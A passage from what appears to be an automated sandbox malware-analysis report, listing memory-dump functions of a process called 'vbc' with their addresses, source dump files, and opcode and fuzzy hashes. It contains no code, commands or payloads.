                                                                                                    Function 004F5458 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 96f4db54214e03ddaea93d61c94ab151487b33fde24b0d0ec97e95d8718fe9b2
                                                                                                    • Instruction ID: 2b62b33435aa8163dd6a53e82b88ee40f433a0c3b8f3495db8e9da02013fe5a1
                                                                                                    • Opcode Fuzzy Hash: 96f4db54214e03ddaea93d61c94ab151487b33fde24b0d0ec97e95d8718fe9b2
                                                                                                    • Instruction Fuzzy Hash: C3E0ED3600CA4CEFCF024E90A851AB93F22AB15306B648157B78645461C22A44B2BF5B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5C70 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 44ba7d9d45ab6529778f12cd35d97a4d0f3e3b089868b15f30005b3874d1f378
                                                                                                    • Instruction ID: 91d7de4f48bf39ddf2e733392a1bc7f22095ca20d949d488b94128f5f58bc9e0
                                                                                                    • Opcode Fuzzy Hash: 44ba7d9d45ab6529778f12cd35d97a4d0f3e3b089868b15f30005b3874d1f378
                                                                                                    • Instruction Fuzzy Hash: 40D012313087DCA30204254B684447E7A9DD7C67923154037FB038B711C669490277EF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FB721 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e7b7299192e07ca719a10ddc4a86ec16308cf17fea611fcda74f7c9f5f6f1f8
                                                                                                    • Instruction ID: 9b645487ab0a664beafb9e223e31d88f427225e48ab797b537799aa4eb338360
                                                                                                    • Opcode Fuzzy Hash: 6e7b7299192e07ca719a10ddc4a86ec16308cf17fea611fcda74f7c9f5f6f1f8
                                                                                                    • Instruction Fuzzy Hash: 64E08C3490E2CCAFCB02CBB04C904EE7FF0EE0220071503EBD884D7653D6210A08AB53
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528580 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ba75e3fb7f7c7f0dccf8fe642e6277513d6f8c136ed3db902035baed9dd1daf4
                                                                                                    • Instruction ID: 940eddc00535b608b6fd3e5444a9268098c6a42889f5a8e7cce2b632169798f7
                                                                                                    • Opcode Fuzzy Hash: ba75e3fb7f7c7f0dccf8fe642e6277513d6f8c136ed3db902035baed9dd1daf4
                                                                                                    • Instruction Fuzzy Hash: F3E04F7194E3C86FCB02CBB44C518DE7FB69A0220071502DFD545D75A3D6690A149B63
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052EEB1 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e27682e84095d567b397b29f7aaf3563112d526583d6f68d96061ac350d0d91
                                                                                                    • Instruction ID: 860827836fbb95bf82013d6685e4755482c3496a59ccf060ae4743fe64e65d08
                                                                                                    • Opcode Fuzzy Hash: 8e27682e84095d567b397b29f7aaf3563112d526583d6f68d96061ac350d0d91
                                                                                                    • Instruction Fuzzy Hash: A3E08C7111C2805FC302CB24A8608A6BFFC8E8A410B08848FF8C4C7583C919CD0BCB73
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00261197 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 667536fd5fe5d29a2081e6d2587cbbee98bcb2a76d14b2e1b846d659df570cb9
                                                                                                    • Instruction ID: bba934874962e1497b8cbf06335b8fd41663eac2cd185dc20b3f591d91dbe002
                                                                                                    • Opcode Fuzzy Hash: 667536fd5fe5d29a2081e6d2587cbbee98bcb2a76d14b2e1b846d659df570cb9
                                                                                                    • Instruction Fuzzy Hash: A5F0ED75A14244CFDB00CF84D484ADCFBB2FF85310F6484EAE60A9B224D770A9A0CF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FC99A Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 54ed7859b62a4296bec6402ff40b9750827344f7a39ec1df1512889076842ff8
                                                                                                    • Instruction ID: 1c5bc07873c11e4cd74d7072f3164057037c5141b719cc80f400512534b00c64
                                                                                                    • Opcode Fuzzy Hash: 54ed7859b62a4296bec6402ff40b9750827344f7a39ec1df1512889076842ff8
                                                                                                    • Instruction Fuzzy Hash: 2DE0867194D2C89FC703CBF48C118AE7FF8AE06200B1546DBD484EB152EA740A559752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1C78 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 31df824dd6ac750c797a802a76aa83245d725dde26fcb35acd72fe9da00a26cc
                                                                                                    • Instruction ID: 13d0fad7e8265048bc6cce88ace86ee1671bd4d87265f01fe8e8bafd7c665198
                                                                                                    • Opcode Fuzzy Hash: 31df824dd6ac750c797a802a76aa83245d725dde26fcb35acd72fe9da00a26cc
                                                                                                    • Instruction Fuzzy Hash: 14D0C2323001086BC2002649AC05F6B7A5EC7C4760F108036F704C7294CA705C0147E9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F60A0 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a2dfcbe3b73589291edb5770ef438ca786a125b056ea472296c442a0defaea00
                                                                                                    • Instruction ID: 6731b2f7fd48887598f7895fd1f80aae7e28396c9f1ed80d1cfb0237e3d730c6
                                                                                                    • Opcode Fuzzy Hash: a2dfcbe3b73589291edb5770ef438ca786a125b056ea472296c442a0defaea00
                                                                                                    • Instruction Fuzzy Hash: 52E04F7411D7809FC303CB14DD6089ABFE1DF86600714448FE4C047652C1229D19C763
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F159A Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e2405aef80a62176153e9e247dae35afd8be07db46c25ab16ead486e2a1b00e1
                                                                                                    • Instruction ID: fd5285252bae607f2c75674262e0d05f7307bf604b9bb94af545a4828342cf09
                                                                                                    • Opcode Fuzzy Hash: e2405aef80a62176153e9e247dae35afd8be07db46c25ab16ead486e2a1b00e1
                                                                                                    • Instruction Fuzzy Hash: CCE0C27190E288EFCB02DFA44C109AA7FB5DF43300B1542EBD409CB263E5360E1CA752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F4EE8 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 29415df5bca79a94af5603605081a1bfd802030ceee9ff252d64be928992d77e
                                                                                                    • Instruction ID: 0eed64fcbc79c467e17c195ce9b50e997b189d41a98aef0f31f93c7b1793b844
                                                                                                    • Opcode Fuzzy Hash: 29415df5bca79a94af5603605081a1bfd802030ceee9ff252d64be928992d77e
                                                                                                    • Instruction Fuzzy Hash: 5FE0127451D7C45FC342CB148C608A6BFA1EF86104705898FE8C08B692C622990EC765
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FC752 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5d34283ecd870976e4262a49bd057ec408af57d3d5a4080e1bc68b4f4da7591a
                                                                                                    • Instruction ID: a864bb9bd6958c76d2f71866fa34711ecb553b1a0b815b7e013efe16348f48ef
                                                                                                    • Opcode Fuzzy Hash: 5d34283ecd870976e4262a49bd057ec408af57d3d5a4080e1bc68b4f4da7591a
                                                                                                    • Instruction Fuzzy Hash: 4BE0867194D2C89FCB03CBB48C1189E7FF5AE07200B1542EFD485DB163E9341E149752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00547CA0 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 90bd7bb58ab7039f8f45d14d281aca916e0dbb34f0319f6a4bfa0ef7cecb4674
                                                                                                    • Instruction ID: 50f90d74ba692874e074c3d489e4d960bca8a0cc35132fe13de6612760cb0ada
                                                                                                    • Opcode Fuzzy Hash: 90bd7bb58ab7039f8f45d14d281aca916e0dbb34f0319f6a4bfa0ef7cecb4674
                                                                                                    • Instruction Fuzzy Hash: AED0123164831D9BDA2065605842BE53BD8BB49719F110869E6055F281DBA1ED418751
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522140 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58dd89b02b9596fcebcf1ec7138d6e4cae04c7ca6040424478a043b74b81701b
                                                                                                    • Instruction ID: 06c854efe219187dc66552e1b5554d9724b546266e57ce54e59c65e4355c39a3
                                                                                                    • Opcode Fuzzy Hash: 58dd89b02b9596fcebcf1ec7138d6e4cae04c7ca6040424478a043b74b81701b
                                                                                                    • Instruction Fuzzy Hash: 43E0862180D3886FCB02CBA48C0195BBFF89A0220470541EBD444DB153DA354E149792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00520139 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cda6d357daf95ce86a6ba2f8044ccb3e9c11166c1a248869aade42d0c37e4734
                                                                                                    • Instruction ID: dd1840b82e5d3492201a634048f6af65d8be9dd2dda88c3ed6ba755c287c254d
                                                                                                    • Opcode Fuzzy Hash: cda6d357daf95ce86a6ba2f8044ccb3e9c11166c1a248869aade42d0c37e4734
                                                                                                    • Instruction Fuzzy Hash: 51D0127524D3905FE206CB109C518A6BFA5EFD6320714888FE48087292C6258C0BC731
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CCC0 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c31ff8d42b1aa149c67179990c4509042d0cb76ce6c9cd9636a354831450b73
                                                                                                    • Instruction ID: 7a13461c5213d4413852ac506162511e68725fd36dbcbe3381d983500b382c89
                                                                                                    • Opcode Fuzzy Hash: 6c31ff8d42b1aa149c67179990c4509042d0cb76ce6c9cd9636a354831450b73
                                                                                                    • Instruction Fuzzy Hash: C6E0C2B184D288AFC702DBE08C1089E7FB99A0220071242FB9544CB162E6354E95DBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052EDB8 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 64e4b80a81447abbd97ae191258713391f9e19c8ddd078c015293971fbcb9c9d
                                                                                                    • Instruction ID: 4ed9bba4872e09f469ee4fe3dbe89a72a25ce8f75ae28eaac2b2aad0d3dbf23d
                                                                                                    • Opcode Fuzzy Hash: 64e4b80a81447abbd97ae191258713391f9e19c8ddd078c015293971fbcb9c9d
                                                                                                    • Instruction Fuzzy Hash: C8E0867510D7811FD352C6249C60A67BBA89F86100F0984DEE8D083593D614890BD731
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260970 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d80480e158b67c6ab4b0d776eed6a60e8a6766fcdb6943147713d6d62e9cf087
                                                                                                    • Instruction ID: 118a5ca9032135149b98a827008004cfc28ce7a947bcec35d789d1ec812d4dba
                                                                                                    • Opcode Fuzzy Hash: d80480e158b67c6ab4b0d776eed6a60e8a6766fcdb6943147713d6d62e9cf087
                                                                                                    • Instruction Fuzzy Hash: 65E08C75A0914C9FCB01CFA8AA00AAD7BF0DF06204B5002AA9549D3612E6394E048B13
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00261E59 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 729d0aecdf083ee41761059302fe047c5dd8b91241b07c07eacf4aa88f3b7c32
                                                                                                    • Instruction ID: 7f084d1f5b469261e6850d538f5ceed07123d6958c5976d4d5da51bcde06fd5e
                                                                                                    • Opcode Fuzzy Hash: 729d0aecdf083ee41761059302fe047c5dd8b91241b07c07eacf4aa88f3b7c32
                                                                                                    • Instruction Fuzzy Hash: 34E0466680E28CAFCB02CBB0AC515DE7FB5AE02204B2902EFC585D7593E6610A189B52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484F9A9 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 97bf8461635e8ba3080236b8b90816d6a1c27f4909b9f3882b5c698592272bb2
                                                                                                    • Instruction ID: 6c593e07165c3f4bee71d11ac8f75bc6669b8eb9e2225d0daf494857774661af
                                                                                                    • Opcode Fuzzy Hash: 97bf8461635e8ba3080236b8b90816d6a1c27f4909b9f3882b5c698592272bb2
                                                                                                    • Instruction Fuzzy Hash: 17E0123415D7D85FD342CB519C548A5BFA1EF862107048A8FDCD487692C616994EDB22
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FEA78 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e6d68e1606dd801bb54d0b48e444181337b0c00488d1d30a8f73ce379a2a969
                                                                                                    • Instruction ID: 3a116da5ead3a22221ce002f8be983b3ee91d0be8930381a4ad112e952263891
                                                                                                    • Opcode Fuzzy Hash: 8e6d68e1606dd801bb54d0b48e444181337b0c00488d1d30a8f73ce379a2a969
                                                                                                    • Instruction Fuzzy Hash: E5E0EC6414C3C16FD316D7249C62C97BFA5AB96210709888FF4C197293C6599847C722
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9420 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: abf3c9e0e73510f8070d39b8b11267f0010accc06877c4ecbc52d1485a0ac091
                                                                                                    • Instruction ID: f69a0f21683346c3bc952b08197ac727602de01efa21c59e9a355b19d9267e48
                                                                                                    • Opcode Fuzzy Hash: abf3c9e0e73510f8070d39b8b11267f0010accc06877c4ecbc52d1485a0ac091
                                                                                                    • Instruction Fuzzy Hash: 4DE08C70C0A188AFC702CBB46C208AA7FF49F02204B1541EBC584DB163E9320E249B46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F8F88 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 74136f1e7c4b56f008e97d310bae706990f33917a07bda8a228705b33fd4e429
                                                                                                    • Instruction ID: e30e84d6eaabcf15693b2abe752c6989d188675bad52606e3582f41903bfde94
                                                                                                    • Opcode Fuzzy Hash: 74136f1e7c4b56f008e97d310bae706990f33917a07bda8a228705b33fd4e429
                                                                                                    • Instruction Fuzzy Hash: 76E0127511D3C45FD342DB109C908D6FFB1EBD6340B19898FD8C187252C611991FD722
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FF7B8 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1605b551c148f8d6c4b7af8f71261f1a3ead7adc57cfa16cf23391611c972938
                                                                                                    • Instruction ID: c04381fc7ff09242fffe4e5fe8c8e1dc0a129c09d772c731c1cf45c07206a300
                                                                                                    • Opcode Fuzzy Hash: 1605b551c148f8d6c4b7af8f71261f1a3ead7adc57cfa16cf23391611c972938
                                                                                                    • Instruction Fuzzy Hash: B4E0867110C5909FD301CB14DA54C2ABBB1EFC5604728C48FE444CB152C532DC17CBB2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484DECF Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 831fab66221b2c82a2661bd32f459c01a54b8aff5388e5657596e7e96b99118e
                                                                                                    • Instruction ID: db60b74093c3829ea2898fe2a51d2051750fb17dc9fe4fae6a94e4e178a56dab
                                                                                                    • Opcode Fuzzy Hash: 831fab66221b2c82a2661bd32f459c01a54b8aff5388e5657596e7e96b99118e
                                                                                                    • Instruction Fuzzy Hash: 3DE0C2B180C288DFC702DFA08D107EA7BF5DF01300F1142EBC808D7261EA314B21AB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484DF09 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 092d6ba4f393871680686fb923c45862d94868dd2fb1bbc9ec7ac33df83812f8
                                                                                                    • Instruction ID: 91a203b597aee99b9d54cf1ba77ed2be15b4122596fe859ecd307a350e98802b
                                                                                                    • Opcode Fuzzy Hash: 092d6ba4f393871680686fb923c45862d94868dd2fb1bbc9ec7ac33df83812f8
                                                                                                    • Instruction Fuzzy Hash: 15D0A53810C64C5FD34686419C50455BF72DFC7250714C747AC4CC7161C535DD0BD711
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5828 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27a9b1c182d0a9412356e8709f9a41463dc7853912359b377e8da75b257fa9ca
                                                                                                    • Instruction ID: 395ba19eea9a50f1f0736d1cf38d6f7a76aaa419b2321b21971326bac6654366
                                                                                                    • Opcode Fuzzy Hash: 27a9b1c182d0a9412356e8709f9a41463dc7853912359b377e8da75b257fa9ca
                                                                                                    • Instruction Fuzzy Hash: F3E012B660E3C19FD353CB20CCA1956BFA1AFE6200B19C8DFD4C187697CA258D0AC752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F30FF Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4f43a47da0b991eed8c3ed9abc27192b883fd1d43c77c12b80fae8a66df886f8
                                                                                                    • Instruction ID: 7d3bc10556f1fdad23184626c0645e77862c0469392ed5cd089a027a7c9bdb77
                                                                                                    • Opcode Fuzzy Hash: 4f43a47da0b991eed8c3ed9abc27192b883fd1d43c77c12b80fae8a66df886f8
                                                                                                    • Instruction Fuzzy Hash: AEE086355091C8AFC702DFA09C1059E7BB59B05204F1181EBDD48C7292EA305B149B92
                                                                                                    Uniqueness

